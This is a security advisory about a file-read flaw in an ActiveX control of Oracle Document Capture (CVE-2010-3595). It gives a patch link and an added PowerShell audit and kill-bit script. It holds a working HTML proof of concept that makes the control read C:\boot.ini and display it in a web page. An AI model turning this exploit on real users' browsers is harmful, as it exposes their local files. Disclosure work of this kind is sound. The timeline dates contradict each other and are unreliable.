Credit:
The information has been provided by Alexey Sintsov.
The original article can be found at: http://seclists.org/bugtraq/2011/Jan/147
Vulnerable Systems:
* Oracle Document Capture 10.1350.0005
The vulnerable method is "ImportBodyText()".
For example, if the filename "C:\\boot.ini" is passed to the "ImportBodyText" method, the control opens and reads the file "C:\boot.ini".
The content of boot.ini is then loaded into the "BodyText" property.
Class EasyMailSMTPObj
GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}
Number of Interfaces: 1
Default Interface: IEasyMailSMTPObj
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False
Example:
*******
<HTML>
<HEAD>
<TITLE>DSECRG</TITLE>
</HEAD>
<BODY>
<OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>
<SCRIPT>
function Exploit(){
ora.ImportBodyText("C:\\boot.ini");
document.write("Try to read c:\\boot.ini:<br><br>"+ora.BodyText);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>
Patch Availability:
All customers can download CPU patches following instructions from:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
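To check whether a host still exposes this control to Internet Explorer, the registry attributes reported above (Safe for Script, Safe for Init, kill bit) can be audited with the PowerShell below. This is an added example, not part of the original advisory or of Oracle's patch: the function names and the `-SetKillBit` switch are hypothetical, the category GUIDs and the `ActiveX Compatibility` key are the standard Windows locations, and setting the kill bit is a general ActiveX workaround assumed here, not a step the advisory gives.

```powershell
# Added example. The CLSID is the one from the advisory; Get-ControlExposure,
# Get-CompatFlags and -SetKillBit are hypothetical names. Run elevated for -SetKillBit.
param([switch]$SetKillBit)

$Clsid       = '{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}'
$KillBitFlag = 0x400   # bit in "Compatibility Flags" that blocks the control in IE
$ClassRoots  = @(      # native and 32-bit (WOW64) COM registrations
    'Registry::HKEY_CLASSES_ROOT\CLSID',
    'Registry::HKEY_CLASSES_ROOT\Wow6432Node\CLSID'
)
$CompatRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)
$SafeCategories = [ordered]@{   # standard component-category IDs
    'SafeForScript' = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
    'SafeForInit'   = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
}

function Get-CompatFlags([string]$Root) {
    $p = Get-ItemProperty -LiteralPath "$Root\$Clsid" -ErrorAction SilentlyContinue
    if ($p) { [int]$p.'Compatibility Flags' } else { 0 }
}

function Get-ControlExposure {
    $keys = @($ClassRoots | ForEach-Object { "$_\$Clsid" } | Where-Object { Test-Path -LiteralPath $_ })
    $r = [ordered]@{ Clsid = $Clsid; Registered = ($keys.Count -gt 0) }
    foreach ($name in $SafeCategories.Keys) {
        $cat  = $SafeCategories[$name]
        $hits = @($keys | Where-Object { Test-Path -LiteralPath "$_\Implemented Categories\$cat" })
        $r[$name] = ($hits.Count -gt 0)
    }
    # The kill bit only protects the host if it is set in every registry view present.
    $views = @($CompatRoots | Where-Object { Test-Path -LiteralPath $_ })
    $unset = @($views | Where-Object { -not ((Get-CompatFlags $_) -band $KillBitFlag) })
    $r['KillBitSet'] = ($views.Count -gt 0) -and ($unset.Count -eq 0)
    [pscustomobject]$r
}

if ($SetKillBit) {
    foreach ($root in ($CompatRoots | Where-Object { Test-Path -LiteralPath $_ })) {
        $key = "$root\$Clsid"
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key | Out-Null }
        $value = (Get-CompatFlags $root) -bor $KillBitFlag   # keep any existing flags
        New-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -PropertyType DWord -Value $value -Force | Out-Null
    }
}

Get-ControlExposure
```

A host that reports `Registered`, `SafeForScript` and `SafeForInit` as True with `KillBitSet` False matches the state described in this advisory.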
CVE Information:
CVE-2010-3595
Disclosure Timeline:
Reported 29.01.2010
Second report 02.02.2010
Date of Public Advisory 24.01.2010